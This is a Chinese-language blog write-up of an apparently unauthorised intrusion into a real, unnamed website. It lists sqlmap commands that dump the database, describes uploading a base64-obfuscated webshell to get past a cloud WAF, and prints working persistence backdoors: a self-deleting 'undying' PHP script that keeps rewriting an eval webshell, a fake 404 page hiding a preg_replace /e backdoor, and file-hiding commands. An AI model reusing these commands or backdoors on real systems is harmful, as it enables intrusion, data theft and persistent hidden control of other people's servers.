【writeup】某站一次简单的渗透GetShell

前言


切记勿要违法犯罪

信息搜集

可以利用网络上强大的搜索引擎,或者Google hacking进行关键字搜索特定目标站点,这个以后单独开一篇。

找到目标站点

获取IP地址,nmap扫描端口

获取目标站点横幅

加载字典获取目标站点目录

获取到phpinfo信息

获取到web后台

获取到upload路径

发现注入点,进行手工测试

SQLmap测试

存在注入点,但是不要慌,看看能不能绕过

绕过成功!

外网入口利用

外网入口利用的办法有很多,这里我只阐述数据库注入,目标站点还有XSS漏洞getwebshell,不再阐述。

在本次渗透中,利用数据库注入点漏洞进行获取数据库有效信息,进而getwebshell

查询当前数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-db

查询当前数据库用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --current-user

查询是否当前数据库是管理员用户

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --is-dba

查询数据库用户角色

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --roles


权限太低

查询所有数据库

# sqlmap -u "xxxxx.com/xxxx.php?id=1" --dbs

爆表

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX --tables

爆字段

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T --columns

爆数据

# sqlmap -u "xxxxx.com/xxxx.php?id=1" -D XX -T -C  XXX  --dump


运气不错,密码没有md5加密,现在已经可以登录网站后台。

登录后台

发现fckeditor编辑器文件上传漏洞

查询编辑器版本

尝试文件上传

被拦截,谷歌了一下,imunify360 云waf,国外一个比较大型的安全厂商,我利用bp抓包,截断,文件包含,中间件解析,PHP CGI解析均被拦截,那么这个编辑器漏洞可能无法利用了。

发现意外上传点

在后台product栏目有个文件上传漏洞,这是原站上传pdf文件资料下载点,尝试base64加密传一句话利用蚁剑流量混淆加密传输成功绕过。

连接蚁剑


连接成功!

终端测试


权限太低了,除root账户外,几乎都没有任何账户能够登陆ssh和执行shell命令。

意外之喜


发现大佬已经光顾过这个站点,还留下了后门和大马,尝试bp爆破。

权限提升与维持

提权

利用Linux内核进行提权,但是以往的内核提权服务器容易崩溃,所以没有尝试。

权限维持

在getshell后,往往因为内网渗透的需要不得不长时间对目标进行持续威胁(简称APT),因此需要进行权限维持,隐藏后门。

隐藏文件

attrib +s +h xxx.php  //隐藏xxx.php文件

attrib命令 用于修改文件属性
+s 设置系统文件属性
+h 设置隐藏属性

在文件夹下无法看到xxx.php,但仍然可以访问

不死马

<?php
set_time_limit(0);//程序执行时间
ignore_user_abort(1);//关掉终端后脚本仍然运行
unlink(__FILE__);//文件完整名
while(1){
file_put_contents('xxx.php','<?php $a=array($_REQUEST["xxx"]=>"3");
$b=array_keys($a)[0];
eval($b);?>');
sleep(5);
}
?>

该脚本每5秒向服务器创建xxx.php,并写入一句话免杀木马,结合attrib命令隐藏文件更好地建立后门。

404页面隐藏后门

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
function func(){
    return @$_REQUEST["xxx"];
}
preg_replace("/xxx/e",func(),"i am xxx");
header('HTTP/1.1 404 Not Found');
?>

因为目标站点为Linux服务器,所以只列出了几个,windows的权限维持还可以利用.user.ini文件构成的PHP后门、建立影子账户、metasploit权限维持、shift后门、远程桌面会话劫持等方法,以后遇到了再说

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


  Previous post ヨスガノソラ
Next post   Python学习笔记(一)

仅有一条评论

  1. x计划 x计划
    很细,思路清晰

添加新评论

选择表情

  TimeLine

新年忙,过完年后抽时间更新:mask:
--- updated on 2021-02-13 16:42:05 星期六

  About Me

我就是随便写写,您随便看看。
有事说事,没事烧纸,闲人勿扰,谢谢。
工作:网络攻防。
Tips:
1、问问题,请直接使用真实邮箱地址回复,不然你收不到信息。
2、为了防止爬虫骚扰,我已经去掉其他联系方式。

  Recent Comments

  •  zero: git进不去了404
  •  夏目贵志: 很奈斯,我喜欢这种不是改太多的后台主题只是默认的后台主题导航在手机模式下很不友好
  •  dd: 复制不了那个值这么办
  •  dd: 为什么Java安装不成功
  •  nameETC: 爱了(^_^),谢谢大佬
  •  Yolen: 来逛逛。
  •  小光: 大佬可以分享下解压密码吗?
  •  粤: 请问那个解压密码是啥呀
  •  阿巴阿巴: bat总是闪退怎么办呀
  •  JWZ_fit: 我使用的是vmess,在windows上可以连接,在kali上就显示[Warning] v2r...

生活其实很简单,过了今天就是明天。

低头哭过别忘了抬头继续走。

不要被任何人打乱自的脚步,因为没有谁会像你一样清楚和在乎自己梦想。

没有人可以打倒我,除非我自己先趴下!

你要记住你不是为别人而活,你是为自己而活。